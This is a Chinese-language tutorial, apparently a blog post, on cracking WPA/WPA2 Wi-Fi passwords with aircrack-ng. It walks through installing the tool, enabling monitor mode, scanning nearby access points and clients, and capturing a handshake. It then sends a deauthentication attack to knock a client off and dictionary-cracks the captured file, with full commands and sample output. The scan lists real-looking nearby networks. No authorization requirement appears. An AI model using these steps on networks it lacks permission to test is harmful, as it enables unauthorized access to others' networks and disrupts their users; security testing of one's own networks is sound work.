aircrack-ng 字典破解WPA / WPA2
1. 安装
首先安装两个扩展
sudo apt-get install build-essential
sudo apt-get install libssl-dev
然后到http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz 下载最新版的aircrack-ng,解压它
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
gedit common.mak
找到 CFLAGS ?= -g -W -Wall -Werror -O3 并把它改为
CFLAGS ?= -g -W -Wall -O3
保存好后,开始编译安装
make
sudo make install
完了之后它会提示 Run ‘airodump-ng-oui-update’ as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).
于是输入
sudo airodump-ng-oui-update
更新好后即可。
2. 启动无线网卡监控模式:
wy@wy-Inspiron-7420:~$ sudo airmon-ng start wlan0 Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 953 avahi-daemon 954 avahi-daemon 985 NetworkManager 1206 wpa_supplicant 18593 dhclient Process with PID 18593 (dhclient) is running on interface wlan0 Interface Chipset Driver wlan0 Intel 2230 iwlwifi - [phy0] (monitor mode enabled on mon0)
3. 扫描无线AP,找到满意的热点之后,ctrl+c终止扫描:
上部分为热点列表,下部分为连接在热点上的客户端的列表。
wy@wy-Inspiron-7420:~$ sudo airodump-ng mon0 CH 11 ][ Elapsed: 8 s ][ 2014-05-18 11:55 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 08:10:77:AA:XX:82 -88 2 0 0 6 54e WPA2 CCMP PSK Netcore D8:15:0D:21:XX:CA -84 2 0 0 6 54e. WPA2 CCMP PSK TP-LINK_211CCA 14:E6:E4:93:XX:48 -87 2 0 0 6 54e. WPA2 CCMP PSK TP-LINK_936048 D8:15:0D:1B:XX:A6 -86 2 0 0 6 54e. WPA2 CCMP PSK Wiann2061 00:36:76:18:XX:28 -50 83 39 2 11 54e. WPA2 CCMP PSK kk-link A4:17:31:38:XX:CC -63 0 0 0 11 54e WPA2 CCMP PSK mayouyou 00:87:36:08:XX:2C -68 5 0 0 6 54e. WPA2 CCMP PSK 360WiFi-482C CC:34:29:40:XX:16 -127 0 110 22 11 -1 WPA <length: 0> BSSID STATION PWR Rate Lost Frames Probe 00:36:76:18:XX:28 68:17:29:AF:XX:4C 0 0e- 0e 0 40 CC:34:29:40:XX:16 8C:7B:9D:86:XX:3B -1 0e- 0 0 4 CC:34:29:40:XX:16 0C:82:68:2A:XX:E3 -1 0e- 0 0 11 CC:34:29:40:XX:16 0C:82:68:2A:XX:F4 -1 0e- 0 0 95 wy@wy-Inspiron-7420:~$
4. 抓包
sudo airodump-ng -c 6 –w longas mon0
这个窗口不要关。
参数解释:
-c 这里我们设置目标AP的工作频道,通过观察,我们要进行攻击测试的无线路由器工作频道为6;
-w 后跟要保存的文件名,这里w就是“write写”的意思,所以输入自己希望保持的文件名,这里我就写为longas。那么,小黑们一定要注意的是:这里我们虽然设置保存的文件名是longas,但是生成的文件却不是longas.cap,而是longas-01.cap。
5.攻击
sudo aireplay-ng -0 1 –a AP的mac -c 客户端的mac mon0
参数解释:
-0 采用deauth攻击模式,后面跟上攻击次数,这里我设置为1,大家可以根据实际情况设置为10不等;
-a 后跟AP的MAC地址;
-c 后跟客户端的MAC地址;
若第三步的窗口中出现握手包,表示攻击有效。
6. 破解
sudo aircrack-ng -w dic 捕获的cap文件
7. 破解完成之后关闭虚拟网卡mon0
wy@wy-Inspiron-7420:~$ sudo airmon-ng stop mon0 Interface Chipset Driver wlan0 Intel 2230 iwlwifi - [phy0] mon0 Intel 2230 iwlwifi - [phy0] (removed)
字典文件下载地址:
http://bbs.ecjtu.org/thread-29817-1-1.html
http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
详细步骤查看:http://netsecurity.51cto.com/art/201105/264844_all.htm